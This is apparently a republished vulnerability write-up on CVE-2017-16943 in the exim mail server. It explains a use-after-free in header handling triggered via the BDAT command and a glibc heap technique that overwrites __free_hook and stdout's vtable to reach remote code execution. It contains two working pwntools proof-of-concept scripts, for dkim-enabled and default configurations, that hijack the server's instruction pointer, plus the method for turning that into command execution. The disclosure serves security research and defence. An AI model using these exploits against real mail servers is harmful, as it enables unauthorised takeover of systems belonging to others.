Original article is here
To explain this bug, we need to start with the memory management of exim. There is a series of functions whose names start with store_, such as store_get, store_release, and store_reset. These functions are used to manage dynamically allocated memory and improve performance. Their architecture is like the illustration below:
Initially, exim allocates a big storeblock (default 0x2000) and then cuts it into stores when store_get is called, using global pointers to record the size of the unused memory and where to cut in the next allocation. Once the current_block is insufficient, it allocates a new block, appends it to the end of the chain (a linked list), and then makes current_block point to it. Exim maintains three store_pools; that is, there are three chains like the illustration above, and every global variable is actually an array.
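The cutting behaviour described above can be modelled in a few lines of Python. This is only a sketch under stated assumptions, not exim's code: the class names, the 8-byte rounding, and the (block, offset) return value are ours, and only the names current_block, next_yield, yield_length and the 0x2000 default come from the text.

```python
BLOCK_SIZE = 0x2000  # default storeblock size quoted in the article


class Block:
    """One storeblock in the chain (hypothetical model class)."""

    def __init__(self, size):
        self.size = size
        self.next = None  # link to the next block in the chain


class StorePool:
    """Toy model of a single store pool; exim keeps three of these."""

    def __init__(self):
        self.chain_base = None     # first block of the chain
        self.current_block = None  # block that stores are currently cut from
        self.next_yield = 0        # offset of the next cut inside current_block
        self.yield_length = 0      # unused bytes left in current_block

    def store_get(self, size):
        size = (size + 7) & ~7  # assumed 8-byte alignment
        if size > self.yield_length:
            # current_block is insufficient: append a new block to the chain
            block = Block(max(size, BLOCK_SIZE))
            if self.current_block is None:
                self.chain_base = block
            else:
                self.current_block.next = block
            self.current_block = block
            self.next_yield = 0
            self.yield_length = block.size
        offset = self.next_yield
        self.next_yield += size
        self.yield_length -= size
        return (self.current_block, offset)


# Three independent pools, mirroring "every global variable is an array".
pools = [StorePool() for _ in range(3)]
```

In this model, two small calls to store_get return stores in the same block at increasing offsets, while a request that no longer fits starts a fresh block at offset 0.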
This vulnerability is in receive_msg, where exim reads headers:
receive.c: 1817 receive_msg
if (ptr >= header_size - 4)
{
    int oldsize = header_size;
    /* header_size += 256; */
    header_size *= 2;
    if (!store_extend(next->text, oldsize, header_size))
    {
        uschar *newtext = store_get(header_size);
        memcpy(newtext, next->text, ptr);
        store_release(next->text);
        next->text = newtext;
    }
}
This would be fine if the store functions behaved just like realloc, malloc and free. However, they are different and cannot be used in this way. When exim tries to extend a store, the function store_extend checks whether the old store is the latest store allocated in current_block. It returns FALSE immediately if the check fails.
store.c: 276 store_extend
if (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||
    inc > yield_length[store_pool] + rounded_oldsize - oldsize)
    return FALSE;
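To make the two conditions in this check concrete, here is a small Python sketch that works on plain integers instead of pointers. It is an illustration only: we assume that inc is the difference between the new and the old size and that rounded_oldsize is oldsize rounded up to an 8-byte alignment, neither of which is shown in the excerpt above.

```python
def can_extend(ptr, oldsize, newsize, next_yield, yield_length, align=8):
    """Model of the store_extend check (addresses are plain integers)."""
    # Assumption: sizes are rounded up to the pool alignment.
    rounded_oldsize = (oldsize + align - 1) // align * align
    # Assumption: inc is the number of extra bytes requested.
    inc = newsize - oldsize
    # Condition 1: the store must end exactly where the next cut would start,
    # i.e. it must be the latest store allocated in current_block.
    if ptr + rounded_oldsize != next_yield:
        return False
    # Condition 2: the remaining space must cover the extra bytes.
    if inc > yield_length + rounded_oldsize - oldsize:
        return False
    return True
```

For example, a 0x100-byte store at 0x1000 can be extended while next_yield is still 0x1100, but not once any other store has been cut after it and moved next_yield forward.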
Once store_extend fails, exim tries to get a new store and release the old one. Looking into store_get and store_release, we found that store_get returns a store, but store_release releases a whole block if the store is at the head of it. That is to say, if next->text points to the start of current_block and store_get cuts a store inside that block for newtext, then store_release(next->text) frees next->text, which is equal to current_block, and leaves newtext and current_block pointing to a freed memory area. Any further use of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call store_get after next->text is allocated. This was impossible until the BDAT command was introduced into exim. BDAT makes store_get reachable and finally leads to an RCE.
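The sequence of events can be replayed on a toy allocator. The following Python sketch is a simplified model under our own assumptions (hypothetical Block and Pool classes, no alignment, a freed flag instead of a real free()); it only demonstrates the mismatch between a store-granular store_get and a block-granular store_release.

```python
class Block:
    """One storeblock; freed marks that it was handed back to malloc."""

    def __init__(self, size):
        self.size = size
        self.freed = False


class Pool:
    """Toy store pool with just enough state to show the bug."""

    def __init__(self, block_size=0x2000):
        self.block_size = block_size
        self.current_block = None
        self.next_yield = 0
        self.yield_length = 0

    def store_get(self, size):
        if size > self.yield_length:
            self.current_block = Block(max(size, self.block_size))
            self.next_yield = 0
            self.yield_length = self.current_block.size
        store = (self.current_block, self.next_yield)
        self.next_yield += size
        self.yield_length -= size
        return store

    def store_release(self, store):
        block, offset = store
        if offset == 0:
            # The store sits at the head of its block: the whole block is
            # freed, including any other stores that were cut from it.
            block.freed = True


pool = Pool()
pool.store_get(0x2000 - 0x80)    # leave less than 0x100 bytes in the block
text = pool.store_get(0x100)     # next->text becomes the head of a new block
pool.store_get(0x40)             # an unrelated store is cut right after it
newtext = pool.store_get(0x200)  # store_extend would fail, so a new store is cut
pool.store_release(text)         # frees the block that newtext lives in
print(newtext[0].freed, pool.current_block.freed)
```

After the last call, both newtext and current_block refer to a block marked as freed, which is the dangling state described above.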
Exim uses function pointers to switch between different input sources, such as receive_getc and receive_getbuf. When receiving BDAT data, receive_getc is set to bdat_getc in order to check the remaining chunk size and to handle the command that follows BDAT. In receive_msg, exim also uses receive_getc. It loops to read data, stores the data into next->text, and extends the store when it is insufficient.
receive.c: 1817 receive_msg
for (;;)
{
    int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);
    /* If we hit EOF on a SMTP connection, it's an error, since incoming
       SMTP must have a correct "." terminator. */
    if (ch == EOF && smtp_input /* && !smtp_batched_input */)
    {
        smtp_reply = handle_lost_connection(US" (header)");
        smtp_yield = FALSE;
        goto TIDYUP; /* Skip to end of function */
    }
In bdat_getc, once the SIZE is reached, it tries to read the next BDAT command and raises an error message if the following command is incorrect.
smtp_in.c: 628 bdat_getc
case BDAT_CMD:
{
    int n;
    if (sscanf(CS smtp_cmd_data, "%u %n", &chunking_datasize, &n) < 1)
    {
        (void) synprot_error(L_smtp_protocol_error, 501, NULL,
            US"missing size for BDAT command");
        return ERR;
    }
Exim usually calls synprot_error to raise an error message, which also logs the error at the same time.
smtp_in.c: 628 bdat_getc
static int
synprot_error(int type, int code, uschar *data, uschar *errmess)
{
    int yield = -1;
    log_write(type, LOG_MAIN, "SMTP %s error in \"%s\" %s %s",
        (type == L_smtp_syntax_error)? "syntax" : "protocol",
        string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);
The log messages are passed through string_printing. This function ensures that a string is printable. For this reason, it expands the string to escape any unprintable character, for example '\n' -> '\\n'. Therefore, it asks store_get for memory to store the resulting string.
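To illustrate why a single unprintable byte in a command costs an allocation, here is a minimal Python model of the escaping behaviour described above. It is a sketch, not exim's implementation: the exact escape table is an assumption (we escape newline as \n and every other unprintable byte in three-digit octal).

```python
def string_printing(s: bytes) -> bytes:
    """Return s unchanged if it is printable, else a longer escaped copy."""
    if all(0x20 <= c < 0x7F for c in s):
        return s  # nothing to escape, so no new memory is needed
    out = bytearray()
    for c in s:
        if 0x20 <= c < 0x7F:
            out.append(c)
        elif c == 0x0A:
            out += b"\\n"
        else:
            out += b"\\%03o" % c  # assumed octal escape form
    return bytes(out)  # stands in for a buffer obtained from store_get


escaped = string_printing(b"a" * 4 + b"\x7f")
print(escaped, len(escaped))
```

The escaped copy is always longer than the input when at least one byte needs escaping, which is why the function has to request a fresh store in that case.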
This allocation makes the check if (!store_extend(next->text, oldsize, header_size)) in receive_msg fail when the next extension occurs, which then triggers the use-after-free.
The following is the Proof-of-Concept (PoC) Python script for this vulnerability. This PoC hijacks the control flow of the SMTP server and sets the instruction pointer to 0xdeadbeef. For fuzzing purposes, we changed the runtime configuration of exim. As a result, this PoC works only when dkim is enabled. We use it as an example because the situation is less complicated. The version with the default configuration is also exploitable, and we will discuss it at the end of this section.
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *
r = remote('127.0.0.1', 25)
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<[email protected]>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1250+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.recvuntil('command')
r.send('\n')
r.interactive()
Running out of current_block
In order to achieve code execution, we need to make next->text get the first store of a block. That is, we need to run out of current_block and make store_get allocate a new block. Therefore, we send a long message 'a'*0x1250+'\x7f' with an unprintable character to cut current_block, making yield_length less than 0x100.
Starts BDAT data transfer
After that, we send a BDAT command to start the data transfer. At the beginning, next and next->text are allocated by store_get.
The function dkim_exim_verify_init is called next, and it also calls store_get. Notice that this function uses ANOTHER store_pool, so it allocates from the heap without changing current_block, which next->text also points to.
receive.c: 1734 receive_msg
if (smtp_input && !smtp_batched_input && !dkim_disable_verify)
    dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);
Call store_get inside bdat_getc
Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the current_block with store_get in string_printing.
Keep sending msg until extension and bug triggered
In this way, while we keep sending huge messages, current_block gets freed after the extension. In glibc's malloc.c (so-called ptmalloc), the allocator manages a linked list of freed memory chunks called the unsorted bin. A freed chunk is put into the unsorted bin if it is not the last chunk on the heap. In step 2 (starting the BDAT data transfer), dkim_exim_verify_init allocated chunks after next->text. Therefore, this chunk is put into the unsorted bin, and the linked-list pointers are stored in the first 16 bytes of the chunk (on x86-64). The location written is exactly current_block->next, and therefore current_block->next is overwritten with the address of the unsorted bin inside main_arena of libc (the linked-list pointer fd points back to the unsorted bin if no other freed chunk exists).
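The overlap between the two layouts can be shown with a byte buffer. The sketch below is a model under assumptions: we assume the storeblock header begins with a next pointer followed by a length field, each 8 bytes wide on x86-64, and the bin address is a made-up placeholder rather than a real libc address.

```python
import struct

HYPOTHETICAL_BIN_ADDR = 0x7F0000001000  # placeholder, not a real address


def write_storeblock_header(chunk: bytearray, next_ptr: int, length: int) -> None:
    """Assumed layout: next pointer at offset 0, length at offset 8."""
    struct.pack_into("<QQ", chunk, 0, next_ptr, length)


def free_into_unsorted_bin(chunk: bytearray, bin_addr: int) -> None:
    """Model of free(): fd and bk land in the first 16 bytes of the chunk."""
    struct.pack_into("<QQ", chunk, 0, bin_addr, bin_addr)


def read_block_next(chunk: bytearray) -> int:
    """What the store code sees when it follows current_block->next."""
    return struct.unpack_from("<Q", chunk, 0)[0]


chunk = bytearray(0x20)
write_storeblock_header(chunk, next_ptr=0, length=0x2000)
free_into_unsorted_bin(chunk, HYPOTHETICAL_BIN_ADDR)
print(hex(read_block_next(chunk)))
```

Because fd occupies the same 8 bytes as the assumed next field, the freed block appears to be followed by a block located at the bin address.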
Keep sending msg for the next extension
When the next extension occurs, store_get tries to cut from main_arena, which allows an attacker to overwrite all global variables below main_arena.
Overwrite global variables in libc
Finish sending message and trigger free()
In the PoC, we simply modified __free_hook and ended the line. Exim calls store_reset to reset the buffer, which calls __free_hook inside free(). At this stage, we successfully control the instruction pointer $rip.
However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both __free_hook and _IO_2_1_stdout_. We forged the vtable of stdout and set __free_hook to any call of fflush(stdout) inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer in the vtable of stdout. Hence, we can control both $rip and the content of the first argument.
We consulted past CVE exploits and decided to call expand_string, which executes a command with execv if we set the first argument to ${run{cmd}}, and finally we got our RCE.
When dkim is disabled, the PoC above fails because current_block is the last chunk on the heap. This makes the allocator merge it into the big chunk called the top chunk rather than putting it into the unsorted bin.
The illustrations below describe the difference of heap layout:
To avoid this, we need to make exim allocate and free some memory before we actually start our exploitation. Therefore, we add some steps between step 1 (running out of current_block) and step 2 (starting the BDAT data transfer).
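After running out of current_block:
Send a large amount of data with the DATA command. Each time the buffer proves too small, exim calls store_get to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in the unsorted bin.
End the DATA transfer and start a new message.
Adjust yield_length again by sending an invalid command with an unprintable character, which cuts current_block.
Finally the heap layout is like: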
And now we can go back to step 2 at the beginning and create the same situation. When next->text is freed, it goes into the unsorted bin and we are able to overwrite libc global variables again.
The following is the PoC for default configured exim:
# CVE-2017-16943 PoC by meh at DEVCORE
# pip install pwntools
from pwn import *
r = remote('localhost', 25)
r.recvline()
r.sendline("EHLO test")
r.recvuntil("250 HELP")
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x1280+'\x7f')
r.recvuntil('command')
r.sendline('DATA')
r.recvuntil('itself\r\n')
r.sendline('b'*0x4000+':\r\n')
r.sendline('.\r\n')
r.sendline('.\r\n')
r.recvline()
r.sendline("MAIL FROM:<>")
r.recvline()
r.sendline("RCPT TO:<[email protected]>")
r.recvline()
r.sendline('a'*0x3480+'\x7f')
r.recvuntil('command')
r.sendline('BDAT 1')
r.sendline(':BDAT \x7f')
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
r.send(s+ ':\r\n')
r.send('\n')
r.interactive()
A demo of our exploit is as below.
Note that we have not found a way to leak memory addresses, and therefore we use heap spray instead. Another information leakage vulnerability is required to overcome the PIE mitigation on x86-64.
Remote code execution on remote mail server, affecting over 500k mail servers.